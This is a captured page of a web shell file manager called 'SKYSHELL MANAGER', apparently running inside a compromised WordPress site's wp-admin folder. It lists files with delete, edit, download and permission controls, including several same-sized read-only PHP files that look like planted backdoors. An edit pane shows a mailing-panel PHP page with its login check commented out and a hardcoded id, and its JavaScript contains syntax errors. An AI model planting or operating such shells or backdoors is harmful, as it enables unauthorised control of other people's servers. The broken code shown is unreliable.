📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: ind.php
<?php ##include_once "session.php"; include "/var/www/webmail/WebXmail/login/login_session.php"; ##$eid=trim($_SESSION['eid']); ## Re check $eid="123"; ?> <!doctype html> <html> <head> <!-- Bootstrap --> <link rel="stylesheet" href="css/bootstrap.min1.css"> <!-- Bootstrap responsive --> <link rel="stylesheet" href="css/bootstrap-responsive.min.css"> <!-- jQuery UI --> <link rel="stylesheet" href="css/plugins/jquery-ui/smoothness/jquery-ui.css"> <link rel="stylesheet" href="css/plugins/jquery-ui/smoothness/jquery.ui.theme.css"> <!-- Theme CSS --> <link rel="stylesheet" href="css/style.css"> <!-- Color CSS --> <link rel="stylesheet" href="css/themes.css"> <!-- color box --> <!--<link rel="stylesheet" href="js/plugins/colorbox/colorbox.css"> --> <!-- jQuery --> <script src="js/jquery.min.js"></script> <!-- jQuery UI --> <script src="js/plugins/jquery-ui/jquery.ui.core.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.widget.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.mouse.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.draggable.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.resizable.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.sortable.min.js"></script> <!-- Bootstrap --> <script src="js/bootstrap.min.js"></script> <!-- color box --> <!--<script src="js/plugins/colorbox/jquery.colorbox.js"></script> --> <!--[if lte IE 9]> <script src="js/plugins/placeholder/jquery.placeholder.min.js"></script> <script> $(document).ready(function() { $('input, textarea').placeholder(); }); </script> <![endif]--> <!-- Favicon --> <!-- Apple devices Homescreen icon --> <link rel="apple-touch-icon-precomposed" href="img/apple-touch-icon-precomposed.png" /> <style type="text/css"> #pageloaddiv { position: fixed;left: 0px;top: 0px;width: 100%;height: 100%;z-index: 1000;background: url('<?php echo $loading_img_url;?>') no-repeat center center;border:1px solid 1px; } </style> <style type="text/css"> body { background: #E6E6FA !important; } /* Adding !important forces the browser to overwrite the default style applied by Bootstrap */ .textbox { -moz-border-radius-bottomright: 30px; -webkit-border-bottom-right-radius: 30px; border-bottom-right-radius: 30px; border: 1px solid #848484; outline:0; height:25px; width: 275px; padding-right:20px; } </style> <style> #leftmenu { background: #484848 none repeat scroll 0 0; bottom: 0; height: 100%; left: 0; overflow-x: visible; position: absolute; width: 150px; } .main{ margin-left:150px; overflow: visable; padding-bottom: 30px } div.child-tab.active(display:block;) div.child-tab(display:none;} </style> </head> <body> <div class="container-fluid" id="leftmenu"> <!-- Contenedor --> <ul id="accordion" class="accordion"> <li> <div class="link"><i class="fa fa-database"></i>Webx<i class="fa fa-chevron-down"></i></div> <ul id="menu" class="submenu"> <li id="liid_showmailing" class="tab active"> <a href="smailing" data-toggle="tab"> mailing </a> </li> <li id="liid_process_tab" class="tab"> <a href="sprocess_tab" data-toggle="tab"> Process </a> </li> <li id="liid2_process_tab" class="tab"> <a href="sall_process_tab" data-toggle="tab"> All Process </a> </li> </ul> </li> </ul> </div> <div id="sprocess_tab" class="child-tab"></div> <script> function showprocess() { $.post("process.php", { eid: "2", pflag: = "1" },function(data) { $('#sprocess_tab').html(data); } ); } function showmailing() { $.post("$local_server/mailing.php",{eid:$eid},function(date)($('#viewmailing').html(data);}); } $(document).ready(function () { showmailing(); //show,hide tabs $("li.tab").click(function(){ $("li.tab").removeClass('active'); $('div.child-tab.active').removeClass('active'); var elem=$(this).find('a').attr('href'); $('#'+elem).addClass('active') }); $("#liid_process_tab").click(function() { // showprocess(); $.post("process.php", { eid: "2", pflag: = "1" },function(data) { $('#sprocess_tab').html(data); } ); }); }); </script> </body>
Save